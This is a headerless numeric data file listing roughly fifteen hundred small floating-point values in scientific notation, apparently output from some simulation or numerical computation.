5.29553e-06
5.31722e-06
6.77197e-06
7.86677e-06
7.35725e-06
1.33109e-05
1.57765e-05
1.57134e-05
1.12209e-05
1.63249e-05
1.14922e-05
1.29497e-05
9.48155e-06
8.77915e-06
7.98355e-06
6.03753e-06
9.9202e-06
7.62483e-06
7.57325e-06
2.48987e-05
2.50394e-05
2.18616e-05
2.10934e-05
2.50344e-05
2.49011e-05
2.18246e-05
3.02031e-05
3.36381e-05
3.39723e-05
2.98477e-05
3.0117e-05
3.36765e-05
2.95905e-05
3.04318e-05
2.99165e-05
3.39851e-05
3.3861e-05
3.03815e-05
3.3845e-05
2.99121e-05
2.48573e-05
2.04781e-05
2.46007e-05
2.13367e-05
2.47523e-05
2.50007e-05
2.15282e-05
1.37955e-05
1.60455e-05
1.73473e-05
1.26777e-05
1.70206e-05
1.24596e-05
1.39617e-05
8.86473e-06
7.21314e-06
5.3e-06
5.324e-06
7.3619e-06
7.87029e-06
6.77275e-06
1.33128e-05
1.57739e-05
1.57158e-05
1.12216e-05
1.63303e-05
1.29544e-05
1.14929e-05
9.47822e-06
8.77974e-06
6.04427e-06
7.98249e-06
7.57773e-06
7.62461e-06
9.91609e-06
1.37901e-05
1.73446e-05
1.60392e-05
1.26772e-05
1.70139e-05
1.396e-05
1.24519e-05
8.86115e-06
7.20133e-06
5.29199e-06
5.31771e-06
6.76679e-06
7.86126e-06
7.35215e-06
1.33049e-05
1.57676e-05
1.57083e-05
1.12142e-05
1.63221e-05
1.14857e-05
1.29449e-05
9.47547e-06
8.7786e-06
7.97811e-06
6.03381e-06
9.9148e-06
7.61925e-06
7.56868e-06
2.48583e-05
2.50534e-05
2.14365e-05
2.14373e-05
2.50499e-05
2.50508e-05
2.08285e-05
1.21869e-05
1.4137e-05
1.60906e-05
1.60898e-05
1.32619e-05
1.56143e-05
1.32639e-05
2.49002e-05
2.50426e-05
2.18598e-05
2.10962e-05
2.50373e-05
2.49029e-05
2.1823e-05
3.0204e-05
3.36409e-05
3.39795e-05
2.98469e-05
3.0121e-05
3.3677e-05
2.95994e-05
3.04272e-05
2.99188e-05
3.39841e-05
3.38603e-05
3.03815e-05
3.38381e-05
2.99076e-05
2.48573e-05
2.04776e-05
2.46008e-05
2.1337e-05
2.47523e-05
2.50062e-05
2.15261e-05
1.37904e-05
1.73414e-05
1.60438e-05
1.26746e-05
1.70126e-05
1.39569e-05
1.24542e-05
8.85765e-06
7.20262e-06
5.28949e-06
5.31453e-06
7.35549e-06
7.86099e-06
6.76457e-06
1.33068e-05
1.57752e-05
1.57105e-05
1.12169e-05
1.63249e-05
1.29471e-05
1.14898e-05
9.47144e-06
8.77458e-06
7.97906e-06
6.03749e-06
7.57132e-06
9.91117e-06
7.61861e-06
1.37897e-05
1.73404e-05
1.60388e-05
1.26744e-05
1.70118e-05
1.3957e-05
1.24516e-05
8.85925e-06
7.19983e-06
5.28881e-06
5.31147e-06
6.76244e-06
7.86093e-06
7.35038e-06
1.33027e-05
1.57641e-05
1.57064e-05
1.1208e-05
1.63176e-05
1.14773e-05
1.29419e-05
9.47304e-06
8.77387e-06
7.97522e-06
6.02946e-06
9.91088e-06
7.61412e-06
7.56683e-06
1.21831e-05
1.41367e-05
1.60859e-05
1.60854e-05
1.56117e-05
1.32626e-05
1.32634e-05
6.47737e-06
2.71977e-07
-3.52923e-06
1.92961e-06
3.01759e-06
6.67493e-07
2.95483e-06
6.49281e-06
2.67377e-07
-3.52509e-06
1.9225e-06
3.03688e-06
6.82181e-07
2.94194e-06
5.11421e-06
6.67861e-06
3.94217e-06
-6.53067e-07
7.62628e-06
2.08102e-06
5.74533e-07
5.11601e-06
6.68869e-06
3.94322e-06
-6.55953e-07
7.63115e-06
2.0828e-06
5.74846e-07
5.80364e-06
1.74662e-06
4.93025e-06
7.28624e-07
6.31015e-06
4.8212e-06
2.32754e-06
5.82278e-06
4.82538e-06
3.33579e-06
9.72822e-06
7.77284e-06
5.42939e-06
7.4346e-06
5.64356e-06
3.26642e-06
3.13952e-06
6.67792e-06
6.61694e-06
6.4612e-06
5.02059e-06
5.82688e-06
4.83225e-06
3.34991e-06
9.72411e-06
5.43228e-06
7.77812e-06
7.43862e-06
5.65079e-06
3.26916e-06
3.14058e-06
6.67875e-06
6.46192e-06
6.62325e-06
5.02268e-06
1.77216e-07
-1.44392e-06
1.23303e-06
1.55092e-06
3.75278e-07
8.83671e-07
-2.28598e-06
1.9609e-07
-1.43677e-06
1.23373e-06
1.5566e-06
3.95162e-07
-2.289e-06
8.89912e-07
5.11346e-06
6.67986e-06
3.94252e-06
-6.54073e-07
7.62253e-06
5.73583e-07
2.08118e-06
5.1163e-06
6.69172e-06
3.94833e-06
-6.49393e-07
5.76851e-07
7.63681e-06
2.08774e-06
6.49017e-06
2.77021e-07
-3.5134e-06
1.92568e-06
6.92249e-07
3.02491e-06
2.94314e-06
5.82212e-06
4.8174e-06
3.32652e-06
9.738e-06
7.77295e-06
5.4217e-06
7.43806e-06
5.64459e-06
3.26618e-06
3.12682e-06
6.67076e-06
6.61879e-06
6.45272e-06
5.01582e-06
5.7958e-06
1.75341e-06
4.93846e-06
7.30687e-07
6.30265e-06
4.82765e-06
2.32869e-06
5.82227e-06
4.82312e-06
3.3387e-06
9.72848e-06
5.42456e-06
7.78299e-06
7.43551e-06
5.64359e-06
3.2683e-06
6.67163e-06
3.13192e-06
6.45421e-06
5.01703e-06
6.6246e-06
1.97335e-07
-1.43517e-06
1.23387e-06
1.55576e-06
3.96635e-07
8.91128e-07
-2.28786e-06
1.96687e-07
-1.43058e-06
1.2343e-06
1.55464e-06
3.96768e-07
-2.28422e-06
8.89236e-07
5.79221e-06
1.75281e-06
7.30741e-07
4.93062e-06
6.30517e-06
2.3311e-06
4.82012e-06
5.81554e-06
4.81675e-06
3.32368e-06
9.729e-06
7.42678e-06
5.41772e-06
7.77321e-06
5.63499e-06
3.25955e-06
6.66438e-06
3.12534e-06
5.00814e-06
6.44707e-06
6.61682e-06
5.78795e-06
1.74998e-06
4.93012e-06
7.26865e-07
6.29564e-06
4.81675e-06
2.32665e-06
1.8245e-07
-1.44097e-06
1.23597e-06
1.55469e-06
3.78599e-07
-2.28056e-06
8.85544e-07
1.90635e-07
-1.44574e-06
1.22821e-06
1.55158e-06
3.82095e-07
-2.28771e-06
8.84623e-07
5.12572e-06
6.69203e-06
3.9539e-06
-6.46182e-07
7.6389e-06
5.83691e-07
2.09173e-06
5.12329e-06
6.68686e-06
3.95086e-06
-6.49998e-07
5.82243e-07
7.64219e-06
2.08552e-06
6.48806e-06
2.80306e-07
-3.52057e-06
1.92636e-06
6.87763e-07
3.02568e-06
2.95387e-06
5.81812e-06
4.81254e-06
3.31892e-06
9.73191e-06
7.43191e-06
5.41568e-06
7.77312e-06
5.63904e-06
3.26064e-06
6.66362e-06
3.12142e-06
5.00893e-06
6.44766e-06
6.61974e-06
5.80155e-06
1.76167e-06
7.21516e-07
4.93133e-06
6.29891e-06
2.3381e-06
4.83029e-06
5.80084e-06
1.75545e-06
7.32908e-07
4.93481e-06
6.31015e-06
2.33334e-06
4.82865e-06
1.74427e-07
-1.44426e-06
1.23629e-06
1.55043e-06
3.70995e-07
-2.27763e-06
8.83477e-07
1.97793e-07
-1.43432e-06
1.23382e-06
1.55658e-06
3.97438e-07
-2.28899e-06
8.90249e-07
6.46683e-06
2.5407e-07
-3.5353e-06
1.91025e-06
6.63979e-07
3.00002e-06
2.92253e-06
6.47519e-06
2.70576e-07
-3.52967e-06
1.92123e-06
6.74159e-07
3.01915e-06
2.9414e-06
-3.52352e-06
-1.50425e-06
-5.28535e-06
-1.11131e-06
-4.53809e-06
-5.59522e-06
-4.02474e-06
-3.5256e-06
-1.51015e-06
-5.29847e-06
-1.11226e-06
-4.55349e-06
-5.62212e-06
-4.04875e-06
-2.74554e-07
-2.10652e-06
5.2151e-07
4.23407e-08
4.31539e-07
1.49947e-06
1.40865e-06
-2.7174e-07
-2.09323e-06
5.24523e-07
5.09884e-08
4.39217e-07
1.5057e-06
1.41087e-06
-3.52772e-06
-1.50812e-06
-5.28959e-06
-1.11699e-06
-4.54391e-06
-5.60409e-06
-4.03252e-06
-3.51764e-06
-1.50385e-06
-5.28652e-06
-1.10957e-06
-4.53919e-06
-5.58752e-06
-4.02304e-06
-2.08677e-06
-2.61887e-07
5.2745e-07
5.63986e-08
4.37977e-07
1.50553e-06
1.41283e-06
-2.66118e-07
-2.0909e-06
5.26968e-07
4.8953e-08
4.37027e-07
1.50145e-06
1.4103e-06
-2.09252e-06
-2.69416e-07
5.23418e-07
4.90846e-08
4.34417e-07
1.49955e-06
1.4053e-06
-2.71682e-07
-2.09105e-06
5.24447e-07
4.56806e-08
4.35211e-07
1.49845e-06
1.40452e-06
-3.52278e-06
-1.50986e-06
-5.28532e-06
-1.11388e-06
-4.53595e-06
-5.59374e-06
-4.03048e-06
-3.51762e-06
-1.50631e-06
-5.28585e-06
-1.10932e-06
-4.53581e-06
-5.59666e-06
-4.02899e-06
-2.10724e-06
-2.7163e-07
5.20318e-07
4.5034e-08
4.30284e-07
1.50147e-06
1.40941e-06
-2.09025e-06
-2.66976e-07
5.24604e-07
5.31487e-08
4.36707e-07
1.50298e-06
1.40947e-06
-3.54214e-06
-1.52044e-06
-5.30256e-06
-1.13733e-06
-4.56082e-06
-5.61842e-06
-4.04301e-06
-3.5238e-06
-1.50908e-06
-5.28497e-06
-1.11614e-06
-4.53895e-06
-5.59257e-06
-4.02495e-06
6.58492e-06
1.52206e-05
1.31456e-05
5.28866e-06
2.76255e-05
1.33306e-05
4.59057e-06
4.16599e-07
4.57563e-06
7.84838e-06
6.05067e-06
7.90039e-06
1.61432e-06
5.9725e-06
2.87873e-05
1.31424e-05
2.35728e-05
8.49621e-06
2.73516e-05
8.38016e-06
1.87284e-05
9.84786e-06
1.43282e-05
1.10814e-05
3.62991e-06
1.71543e-06
1.87615e-06
3.98606e-06
-4.77049e-06
6.09615e-07
2.69719e-06
7.83189e-06
-8.99484e-07
2.40604e-05
-4.06081e-06
1.05653e-05
1.8209e-05
-5.3901e-06
1.01639e-05
1.41383e-05
1.09636e-05
6.58659e-06
9.80476e-06
1.58107e-05
2.41429e-06
3.31804e-06
2.94502e-06
1.21455e-05
6.26476e-07
9.33905e-06
9.4889e-07
2.53289e-06
5.41501e-06
2.28924e-07
1.57103e-05
1.18957e-05
1.12108e-05
1.79617e-05
1.04229e-05
7.9334e-06
1.27641e-05
6.61376e-06
1.31472e-05
1.52441e-05
5.31713e-06
1.33658e-05
2.769e-05
4.61408e-06
4.30379e-07
4.58631e-06
7.85916e-06
6.06486e-06
7.92449e-06
1.62876e-06
5.9849e-06
2.88267e-05
1.31743e-05
2.35923e-05
8.52293e-06
2.73745e-05
8.41304e-06
1.87513e-05
9.89884e-06
1.43679e-05
1.11463e-05
3.6291e-06
1.71818e-06
1.88564e-06
3.99149e-06
-4.78263e-06
6.24107e-07
2.7041e-06
7.81852e-06
-9.09263e-07
2.40629e-05
-4.05374e-06
1.05611e-05
1.81915e-05
-5.39339e-06
1.01485e-05
1.41099e-05
1.09725e-05
6.57088e-06
9.80998e-06
1.58413e-05
2.41977e-06
3.32937e-06
2.96214e-06
1.21542e-05
6.28422e-07
9.37834e-06
9.57767e-07
2.50063e-06
5.40121e-06
2.56343e-07
1.57529e-05
1.19079e-05
1.1208e-05
1.79984e-05
1.04292e-05
7.92864e-06
1.27322e-05
1.06404e-05
7.76698e-06
7.77184e-06
1.27945e-08
1.74709e-05
4.761e-06
4.76872e-06
2.53556e-05
9.87536e-06
1.77797e-05
1.42097e-05
3.06836e-05
2.53886e-05
9.92714e-06
1.78036e-05
1.42843e-05
3.06633e-05
1.19631e-05
5.22147e-06
4.08087e-07
9.48567e-06
2.27535e-06
1.20237e-05
5.23713e-06
4.30885e-07
9.49554e-06
2.2993e-06
1.8964e-06
-6.45255e-07
3.28028e-06
3.29369e-06
7.16495e-07
6.97301e-07
8.99716e-06
-6.15295e-06
5.51292e-06
1.02677e-05
1.82286e-05
2.05553e-06
-4.83443e-06
8.13527e-06
3.21903e-06
1.86903e-06
4.99196e-06
-1.98076e-06
4.92823e-06
-2.83347e-06
3.51024e-06
3.36616e-06
1.49428e-06
1.16211e-05
4.28671e-06
9.13987e-06
3.02401e-06
-1.18352e-06
-6.14749e-06
5.5073e-06
1.02559e-05
1.82136e-05
2.04633e-06
-4.84248e-06
8.13307e-06
3.22093e-06
1.87298e-06
4.99004e-06
-1.97279e-06
4.9361e-06
-2.84204e-06
3.51179e-06
2.27921e-07
1.56749e-05
1.19029e-05
1.79608e-05
1.11998e-05
1.04154e-05
7.96123e-06
1.27468e-05
2.16987e-07
1.56675e-05
1.18714e-05
1.79545e-05
1.1167e-05
1.03971e-05
7.88276e-06
1.27151e-05
1.06261e-05
7.79913e-06
7.78331e-06
2.37289e-08
1.75074e-05
4.77407e-06
4.77341e-06
2.53803e-05
9.92901e-06
1.78029e-05
1.41854e-05
3.06783e-05
2.54332e-05
9.9346e-06
1.78245e-05
1.42216e-05
3.06629e-05
1.19559e-05
5.26999e-06
4.6139e-07
9.55131e-06
2.31832e-06
1.19296e-05
5.25587e-06
4.10122e-07
9.52678e-06
2.31046e-06
1.89702e-06
-6.39511e-07
3.31186e-06
3.3004e-06
7.40777e-07
7.02931e-07
8.99101e-06
3.08957e-06
5.64042e-06
1.00146e-05
5.45347e-06
7.82135e-06
3.8107e-06
1.79988e-06
-6.14236e-06
5.53012e-06
1.03091e-05
1.82771e-05
8.16685e-06
2.07686e-06
-4.84873e-06
3.23801e-06
1.87791e-06
5.00289e-06
-1.95837e-06
4.94206e-06
-2.82576e-06
3.53074e-06
3.07968e-06
5.63262e-06
9.98805e-06
5.45623e-06
7.79899e-06
3.7985e-06
1.79609e-06
-6.17423e-06
5.53207e-06
1.0273e-05
1.82323e-05
8.12917e-06
2.05647e-06
-4.88052e-06
3.22547e-06
1.87514e-06
5.00372e-06
-1.95543e-06
4.93336e-06
-2.83324e-06
3.5275e-06
-6.21097e-06
-1.82348e-06
-5.4621e-06
9.29085e-07
-5.29147e-06
-6.26174e-06
-1.82994e-06
-5.48042e-06
9.29306e-07
-5.31772e-06
-7.69647e-06
1.10798e-05
4.11333e-06
-1.72843e-06
-2.52893e-06
-1.16329e-06
-2.88833e-06
2.57386e-06
1.51306e-06
-2.56738e-06
-2.01358e-06
2.43532e-06
7.31058e-07
1.3084e-06
1.55936e-07
1.45926e-06
-1.21862e-08
-4.5594e-06
-1.90968e-06
1.6528e-06
-4.53111e-07
-7.7272e-06
1.10577e-05
4.09669e-06
-1.81623e-06
-2.59704e-06
-1.17004e-06
-2.93724e-06
2.57387e-06
1.50912e-06
-2.56514e-06
-2.01443e-06
2.43337e-06
7.38034e-07
1.30639e-06
1.48286e-07
1.45338e-06
-1.28169e-08
-4.55974e-06
-1.9158e-06
1.64922e-06
-4.58785e-07
6.60487e-06
1.51885e-05
1.31451e-05
5.28277e-06
2.76643e-05
1.33669e-05
4.60557e-06
4.15709e-07
4.58472e-06
7.85624e-06
6.06284e-06
7.9182e-06
1.62489e-06
5.96279e-06
2.87835e-05
1.31327e-05
2.35584e-05
8.37573e-06
8.48186e-06
2.73472e-05
1.87877e-05
9.9063e-06
1.43796e-05
1.11575e-05
3.6476e-06
1.71212e-06
1.88035e-06
3.99146e-06
-4.78005e-06
6.22352e-07
2.69808e-06
7.82096e-06
-9.09861e-07
2.41157e-05
-4.06317e-06
1.82247e-05
1.05782e-05
-5.41397e-06
1.01862e-05
1.41033e-05
6.59463e-06
1.09968e-05
9.7853e-06
1.58496e-05
2.40506e-06
3.31509e-06
2.95591e-06
1.21531e-05
6.0021e-07
9.45157e-06
1.00938e-06
2.51865e-06
5.45058e-06
-3.16731e-08
2.17016e-06
-5.58255e-06
1.47074e-06
1.99296e-06
-2.717e-06
-1.22325e-06
-1.4167e-08
2.18566e-06
-5.5873e-06
1.48105e-06
2.0174e-06
-2.71614e-06
-1.21982e-06
1.0644e-05
7.7858e-06
7.77938e-06
2.81015e-08
1.74802e-05
4.77862e-06
4.77572e-06
2.53646e-05
9.9294e-06
1.77984e-05
1.42429e-05
3.06552e-05
2.53409e-05
9.9e-06
1.77916e-05
1.42624e-05
3.06331e-05
1.19913e-05
5.26431e-06
4.58992e-07
9.52641e-06
2.32505e-06
1.19804e-05
5.23373e-06
4.16846e-07
9.48109e-06
2.29687e-06
1.90985e-06
-6.21737e-07
3.31103e-06
3.31639e-06
7.39843e-07
7.10471e-07
9.01349e-06
3.07593e-06
5.63294e-06
1.00137e-05
5.44849e-06
7.80734e-06
1.7917e-06
3.7986e-06
-6.1628e-06
5.5322e-06
1.02939e-05
1.82698e-05
8.15355e-06
2.07056e-06
-4.86773e-06
3.23639e-06
1.88866e-06
5.00512e-06
-1.96645e-06
4.94575e-06
-2.81796e-06
3.52563e-06
3.38465e-06
1.52413e-06
1.16286e-05
4.30898e-06
9.14942e-06
3.04353e-06
-1.15597e-06
-6.14372e-06
5.52997e-06
1.02761e-05
1.8215e-05
2.07216e-06
-4.82839e-06
8.14919e-06
3.23564e-06
1.89476e-06
5.00727e-06
-1.94775e-06
4.9515e-06
-2.81988e-06
3.52999e-06
2.19161e-07
1.18694e-05
1.56621e-05
1.04052e-05
1.11709e-05
1.79495e-05
7.84044e-06
1.27149e-05
-6.24421e-06
-1.81667e-06
-5.53752e-06
9.61988e-07
-5.3284e-06
-6.28229e-06
-1.79972e-06
-5.40649e-06
1.03077e-06
-5.28816e-06
-7.72754e-06
1.10932e-05
4.10906e-06
-1.8169e-06
-2.59423e-06
-1.15764e-06
-2.94012e-06
2.58256e-06
1.51051e-06
-2.0247e-06
-2.56859e-06
1.30649e-06
2.4418e-06
7.33065e-07
1.61001e-07
1.46308e-06
-1.30986e-09
-4.56772e-06
-1.90804e-06
1.65683e-06
-4.40656e-07
-7.69325e-06
1.10877e-05
4.12683e-06
-1.69865e-06
-2.51661e-06
-1.14403e-06
-2.88538e-06
2.56689e-06
1.50992e-06
-2.56342e-06
-2.02263e-06
2.4327e-06
7.12773e-07
1.29987e-06
1.55319e-07
1.45808e-06
5.76716e-10
-4.57258e-06
-1.91204e-06
1.66814e-06
-4.84384e-07
6.61288e-06
1.52902e-05
1.31815e-05
5.33321e-06
2.76504e-05
1.33438e-05
4.59899e-06
4.21258e-07
4.57273e-06
7.8451e-06
6.05248e-06
7.90584e-06
1.61588e-06
5.99804e-06
2.88391e-05
1.31784e-05
2.36021e-05
8.40875e-06
8.52989e-06
2.7362e-05
1.87598e-05
9.91359e-06
1.4367e-05
1.11537e-05
3.66138e-06
1.70344e-06
1.87945e-06
3.97843e-06
-4.7908e-06
6.21753e-07
2.70154e-06
7.74149e-06
-9.17568e-07
2.4177e-05
-4.05673e-06
1.82257e-05
1.06659e-05
-5.42967e-06
1.02995e-05
1.40125e-05
6.82736e-06
1.09963e-05
9.76105e-06
1.58524e-05
2.40605e-06
3.31934e-06
2.9471e-06
1.21616e-05
5.92e-07
9.31035e-06
9.86055e-07
2.48536e-06
5.36686e-06
-1.43091e-08
2.18259e-06
-5.58495e-06
1.4813e-06
2.01666e-06
-2.71657e-06
-1.21815e-06
-1.60817e-08
2.18179e-06
-5.58818e-06
1.47846e-06
2.01475e-06
-2.71821e-06
-1.22155e-06
6.61559e-06
1.3142e-05
1.5231e-05
5.31389e-06
1.33391e-05
2.76464e-05
4.60302e-06
4.26202e-07
4.5881e-06
7.8534e-06
6.05786e-06
1.6282e-06
7.91816e-06
5.98754e-06
2.88072e-05
1.31868e-05
2.35965e-05
8.52577e-06
2.7353e-05
8.41702e-06
1.87522e-05
9.88077e-06
1.4321e-05
1.11534e-05
3.65152e-06
1.71595e-06
1.88667e-06
3.98833e-06
-4.7916e-06
2.70533e-06
6.28875e-07
7.81249e-06
-9.0147e-07
-4.04978e-06
2.4068e-05
-5.38644e-06
1.81968e-05
1.05653e-05
9.78728e-06
1.58374e-05
2.43039e-06
3.33964e-06
6.37915e-07
2.94784e-06
1.21421e-05
1.01783e-05
1.41221e-05
6.60294e-06
1.10044e-05
9.34085e-06
9.9063e-07
2.55566e-06
5.34553e-06
6.61265e-06
1.52426e-05
1.31602e-05
5.31226e-06
2.76874e-05
1.33505e-05
4.59296e-06
4.16025e-07
4.57794e-06
7.83953e-06
6.04703e-06
1.61474e-06
7.90114e-06
5.9865e-06
2.88299e-05
1.31744e-05
2.35823e-05
8.39414e-06
8.51787e-06
2.73562e-05
1.87479e-05
9.89518e-06
1.43507e-05
1.1152e-05
3.63153e-06
1.70409e-06
1.87486e-06
3.97224e-06
-4.80523e-06
2.69212e-06
6.05911e-07
7.79587e-06
-9.01275e-07
-4.04724e-06
2.40637e-05
-5.39347e-06
1.05658e-05
1.81814e-05
9.77206e-06
1.58373e-05
2.41135e-06
3.32622e-06
6.20315e-07
2.94675e-06
1.2134e-05
9.39476e-06
9.62007e-07
2.55805e-06
5.40778e-06
1.01551e-05
1.41575e-05
1.10162e-05
6.57708e-06
-2.40033e-08
2.17266e-06
-5.56631e-06
1.46507e-06
1.99771e-06
-2.70107e-06
-1.2287e-06
-1.15368e-08
2.17594e-06
-5.58483e-06
1.47898e-06
2.01257e-06
-2.71631e-06
-1.2182e-06
1.06519e-05
7.799e-06
7.79013e-06
3.1205e-08
1.74963e-05
4.78454e-06
4.78061e-06
2.54301e-05
9.97692e-06
1.78194e-05
1.42712e-05
3.06709e-05
2.54373e-05
9.9603e-06
1.78315e-05
1.43098e-05
3.07019e-05
1.19969e-05
5.26388e-06
4.47711e-07
9.51091e-06
2.32736e-06
1.20277e-05
5.27104e-06
4.29244e-07
9.50574e-06
2.32856e-06
1.90629e-06
-6.2327e-07
3.29637e-06
3.30449e-06
7.36506e-07
7.22788e-07
9.02636e-06
3.10287e-06
5.65428e-06
1.00113e-05
5.46244e-06
7.82823e-06
1.81172e-06
3.82189e-06
-6.13918e-06
5.54499e-06
1.02954e-05
1.82476e-05
8.16069e-06
2.07575e-06
-4.84882e-06
3.23517e-06
1.88173e-06
5.00888e-06
-1.9426e-06
4.94444e-06
-2.82517e-06
3.5399e-06
3.37768e-06
1.51137e-06
1.16111e-05
4.30304e-06
9.14408e-06
3.01121e-06
-1.16706e-06
-6.14797e-06
5.53336e-06
1.03006e-05
1.82511e-05
2.07302e-06
-4.85748e-06
8.16344e-06
3.23988e-06
1.89093e-06
4.99698e-06
-1.98289e-06
4.95347e-06
-2.81887e-06
3.51868e-06
2.28328e-07
1.18769e-05
1.56643e-05
1.04283e-05
1.11692e-05
1.79466e-05
7.91689e-06
1.27259e-05
-6.24484e-06
-1.78403e-06
-5.44735e-06
1.03005e-06
-5.29553e-06
-6.31714e-06
-1.80584e-06
-5.42542e-06
9.64611e-07
-5.30583e-06
-7.69205e-06
1.10932e-05
4.13147e-06
-1.74434e-06
-2.53599e-06
-1.13991e-06
-2.88827e-06
2.56633e-06
1.50265e-06
-2.03827e-06
-2.55635e-06
1.28785e-06
2.43393e-06
7.24669e-07
1.40828e-07
1.44803e-06
1.80854e-09
-4.55463e-06
-1.91037e-06
1.653e-06
-4.68466e-07
-7.70016e-06
1.10901e-05
4.13008e-06
-1.72013e-06
-2.54265e-06
-1.16461e-06
-2.90431e-06
2.58261e-06
1.51302e-06
-2.57121e-06
-2.02533e-06
2.44311e-06
7.18262e-07
1.30789e-06
1.72588e-07
1.47465e-06
4.10952e-09
-4.57299e-06
-1.90381e-06
1.67999e-06
-4.3919e-07
6.60686e-06
1.31698e-05
1.52392e-05
5.3152e-06
1.3363e-05
2.76755e-05
4.5979e-06
4.19367e-07
4.58411e-06
7.84506e-06
6.05005e-06
1.62379e-06
7.90912e-06
5.99781e-06
2.88437e-05
1.31814e-05
2.36076e-05
8.52302e-06
2.73813e-05
8.40561e-06
1.87227e-05
9.89267e-06
1.43574e-05
1.11329e-05
3.61754e-06
1.71611e-06
1.88139e-06
3.98088e-06
-4.78622e-06
2.69593e-06
6.12106e-07
7.81287e-06
-8.90885e-07
-4.04014e-06
2.40711e-05
-5.37565e-06
1.81985e-05
1.05728e-05
9.80367e-06
1.585e-05
2.43218e-06
3.34467e-06
6.40886e-07
2.96422e-06
1.2162e-05
1.01545e-05
1.41514e-05
6.57704e-06
1.10005e-05
9.406e-06
1.00782e-06
2.54733e-06
5.39439e-06
6.61994e-06
1.31752e-05
1.52755e-05
5.33041e-06
1.33518e-05
2.76631e-05
4.60557e-06
4.2404e-07
4.58599e-06
7.85646e-06
6.06093e-06
1.62145e-06
7.91864e-06
5.98798e-06
2.88323e-05
1.31823e-05
2.36049e-05
8.4074e-06
8.53903e-06
2.73614e-05
1.87315e-05
9.9005e-06
1.43201e-05
1.11637e-05
3.62542e-06
1.71073e-06
1.87917e-06
3.98606e-06
-4.78906e-06
2.69491e-06
6.20242e-07
7.81161e-06
-9.03014e-07
-4.04431e-06
2.40716e-05
-5.38954e-06
1.05777e-05
1.82121e-05
9.79095e-06
1.58489e-05
2.4179e-06
3.3397e-06
6.28209e-07
2.94648e-06
1.21627e-05
9.34586e-06
9.67853e-07
2.5242e-06
5.40293e-06
1.01713e-05
1.41411e-05
1.10196e-05
6.60805e-06
-3.35119e-08
2.16879e-06
-5.56261e-06
1.45864e-06
1.9872e-06
-2.70129e-06
-1.23318e-06
-1.5259e-08
2.18166e-06
-5.5869e-06
1.47845e-06
2.01637e-06
-2.718e-06
-1.22159e-06
2.04679e-07
1.18777e-05
1.56626e-05
1.03921e-05
1.79284e-05
1.11851e-05
7.87509e-06
1.27224e-05
2.17573e-07
1.18792e-05
1.56719e-05
1.03895e-05
1.79539e-05
1.11781e-05
7.88013e-06
1.26956e-05
-6.20146e-06
-1.8539e-06
-5.40968e-06
9.03425e-07
-5.27738e-06
-6.29652e-06
-1.81854e-06
-5.52744e-06
1.00106e-06
-5.33817e-06
-7.71642e-06
1.10504e-05
4.09003e-06
-1.73031e-06
-2.57479e-06
-1.18269e-06
-2.91061e-06
2.5717e-06
1.50227e-06
-2.5856e-06
-2.0356e-06
2.4303e-06
1.29789e-06
7.06097e-07
1.64103e-07
1.46918e-06
-6.85267e-09
-4.58161e-06
-1.91421e-06
1.65886e-06
-4.42328e-07
-7.71915e-06
1.10525e-05
4.09603e-06
-1.79479e-06
-2.56419e-06
-1.17546e-06
-2.92244e-06
2.5672e-06
1.50893e-06
-2.57926e-06
-2.01475e-06
2.43053e-06
1.30677e-06
7.08518e-07
1.59514e-07
1.46298e-06
-8.84109e-09
-4.5925e-06
-1.92066e-06
1.67364e-06
-4.84306e-07
1.46454e-05
2.02519e-05
1.57876e-05
2.54583e-05
7.07299e-06
4.22719e-07
3.83288e-06
1.27293e-06
1.82334e-06
3.66439e-06
7.6305e-06
9.43701e-06
1.60167e-06
4.29003e-06
8.58686e-06
2.77947e-06
5.01231e-06
9.84433e-06
1.79679e-05
2.31841e-05
2.75076e-06
1.27335e-05
3.60647e-06
2.54483e-05
1.76937e-05
1.63809e-05
2.56952e-05
1.45341e-06
5.63211e-06
4.08594e-06
1.7682e-05
2.23382e-05
1.46516e-05
2.01558e-05
1.58048e-05
2.54144e-05
7.08836e-06
4.37947e-07
3.84567e-06
1.28856e-06
1.84115e-06
3.68649e-06
7.66322e-06
9.45432e-06
1.60761e-06
4.28032e-06
8.60878e-06
2.79421e-06
5.0272e-06
9.87248e-06
1.79721e-05
2.31434e-05
2.71696e-06
1.27131e-05
3.5937e-06
2.54259e-05
1.77176e-05
1.63885e-05
2.56577e-05
1.46885e-06
5.63208e-06
4.09827e-06
1.77054e-05
2.23205e-05
1.45981e-05
2.02481e-05
1.57465e-05
2.5431e-05
7.06301e-06
4.35356e-07
3.85825e-06
1.25578e-06
1.81423e-06
3.7029e-06
7.61779e-06
9.44269e-06
1.62059e-06
4.40734e-06
8.63938e-06
2.78952e-06
5.07365e-06
9.87045e-06
1.79437e-05
2.31232e-05
2.70772e-06
1.26848e-05
3.5909e-06
2.54019e-05
1.76554e-05
1.63627e-05
2.56847e-05
1.45456e-06
5.61087e-06
4.08332e-06
1.7684e-05
2.23117e-05
1.46344e-05
2.01914e-05
1.58053e-05
2.54079e-05
7.08554e-06
4.24034e-07
3.82608e-06
1.28109e-06
1.83217e-06
3.68314e-06
7.64882e-06
9.46132e-06
1.60867e-06
4.41038e-06
8.62364e-06
2.79711e-06
5.05549e-06
9.87234e-06
1.79609e-05
2.31401e-05
2.72374e-06
1.27296e-05
3.60528e-06
2.54104e-05
1.76998e-05
1.63801e-05
2.56805e-05
1.45021e-06
5.62078e-06
4.08294e-06
1.76874e-05
2.23263e-05
1.46134e-05
2.01698e-05
1.5839e-05
2.54091e-05
7.07799e-06
4.36632e-07
3.84297e-06
1.27918e-06
1.8391e-06
3.68319e-06
7.63526e-06
9.46518e-06
1.60783e-06
4.29926e-06
8.61374e-06
2.78958e-06
5.03457e-06
9.90282e-06
1.63751e-05
2.56838e-05
1.47133e-06
5.63388e-06
4.099e-06
1.7715e-05
2.23074e-05
1.79534e-05
2.30955e-05
2.71341e-06
1.27012e-05
3.58892e-06
2.54083e-05
1.76433e-05
1.45857e-05
2.02e-05
1.57627e-05
2.54501e-05
7.07753e-06
4.4386e-07
3.85814e-06
1.27971e-06
1.83503e-06
3.6988e-06
7.64155e-06
9.48083e-06
1.62187e-06
4.38644e-06
8.64084e-06
2.79901e-06
5.06721e-06
9.94493e-06
1.63668e-05
2.5678e-05
1.4734e-06
5.64498e-06
4.10254e-06
1.76906e-05
2.2321e-05
1.79391e-05
2.31081e-05
2.71561e-06
1.26964e-05
3.58692e-06
2.54255e-05
1.75791e-05
1.45755e-05
2.01366e-05
1.5726e-05
2.53814e-05
7.06889e-06
4.15267e-07
3.81789e-06
1.25181e-06
1.80975e-06
3.67205e-06
